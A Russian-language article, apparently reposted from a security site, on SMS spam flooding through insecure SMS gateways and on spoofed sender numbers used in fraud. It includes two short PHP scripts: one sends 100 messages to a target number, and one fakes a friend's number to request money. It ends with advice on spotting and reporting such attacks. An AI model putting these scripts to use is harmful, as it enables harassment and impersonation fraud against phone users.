Чем опасен SMS спам
На сегодня смс спам на мобильных телефонов это редкое событие. Однако если спам начался, то пользователь даже может не успеть удалять их, и они будут приходить пока память на телефоне не заполнится. При этом смс могут приходить с разных номеров, и даже таких: +700000000. Если произведена атака смс спама, то это явно кто-то не из друзей. Такие атаки требуют значительных затрат ресурсов, или же специальных программных или аппаратных средств.
Как происходит реализация атаки смс спама
Очевидно, что смс-спам это не рассылка смс-сообщений с мобильных устройств, так как для этого нужно значительные ресурсы. Такой метод атаки стал доступен из-за плохой защищенности СМС-шлюзов. СМС-шлюз — это сервисная служба, которая реализует передачу и отправку смс-сообщения без мобильного телефона. Такой сервис является сервером, который настроен на передающей и принимающей GSM — станции. Такой сервер может не только работать с разными протоколами в глобальной сети, но и транспортировать СМС-сообщения с мобильных устройств. Схематично принцип работы СМС-шлюза показан на рис.1.
Рисунок 1
Такие смс-шлюзы разрешают отправлять бесплатные смс-сообщения с онлайн сервисов Интернета. Для злоумышленника не составляет труда зарегистрироваться в таких онлайн сервисах, пополнить баланс и отправлять сообщения. Или можно создать свой скрипт который будет отправлять очень много сообщений. Пример кода:
- <?
- $user =»user»;
- $password =»password»;
- $api_id =»xxx»;
- $text =urlencode(«SMS spam»);
- $to =»79035555555″;
- $ret =file(«http://smscenter.com/auth?user=$user&password=$password&api_id=$api_id»);
- if($ret ==»OK»){
- for($i = 0; $i<100; $i++)
- {
- $ret =file(«http://smscenter.com/sendmsg?to=$to&text=$text»);
- if($ret == «OK») echo «message was sent»;
- else echo «message failed»;
- }
- }
- else{
- echo «authentification fail»;exit();
- }
- ?>
Пример наведен на языке PHP, который посылает 100 сообщений с помощью СМС-шлюза.
Защита от атаки СМС-спама
Первым шагом для пользователя мобильного телефона который подвергся атаке смс-спама, нужно осознать тот факт, что он подвергся смс-спаму. Основные признаки атак с помощью СМС-шлюза есть:
- большая частота получения сообщений с одного и того же номера
- нестандартный телефонный номер отправителя
В таком случае нету смысла быстро удалять сообщения, так как скорость их отправки значительно выше. Если есть возможность, то нужно обратиться к сотовому оператору и пожаловаться на смс-спам и продиктовать адрес смс-шлюза. Или же обратится в техническую поддержку данного смс-шлюза, что бы они разобрались с данным инцидентом. В 5% случаев злоумышленников находят, если же они пополняли баланс карточками.
Подделка имя отправителя смс-сообщения
Присланное сообщение может быть отправлено не с того номера который указывается в номере отправителя. Интересная вещь, которую можно использовать как использовать номер вашего знакомого в такой роли. При этом текст может быть в виде просьбы, или же других действий которых нужно что бы пользователь сделал.
Следующий код примерно показывает логику такой атаки:
- <?
- $user =»user»;
- $password =»password»;
- $api_id =»xxx»;
- $text =urlencode(«SMS spamпереведи мне деньги на телефон 7902624737»);
- $to =»79035555555″;
- $from =»7906666666″;
- $ret =file(«http://smscenter.com/auth?user=$user&password=$password&api_id=$api_id»);
- if($ret ==»OK»){
- for($i = 0; $i<100; $i++)
- {
- $ret =file(«http://smscenter.com/sendmsg?session_id=$sess_id&to=$to&text=$text&from=$from»);
- if($ret == «OK») echo «message was sent»;
- else echo «message failed»;
- }
- }
- ?>
Заметить такую атаку сложно, если злоумышленник изучил ваше окружение или же другие характеристики. Для минимизации риска нужно быть бдительным, и не спешить совершать то, что написано в смс-сообщении. Первым и верным способом, это перезвонить на этот номер и спросить действительно ли ему нужны деньги и зачем. Если абонент вне зоны доступа, скорее всего злоумышленник вывел из строя мобильный телефон того, кому бы вы позвонили.
Оригинал статьи размещён здесь: http://infoprotect.net/protect_device/sms_spam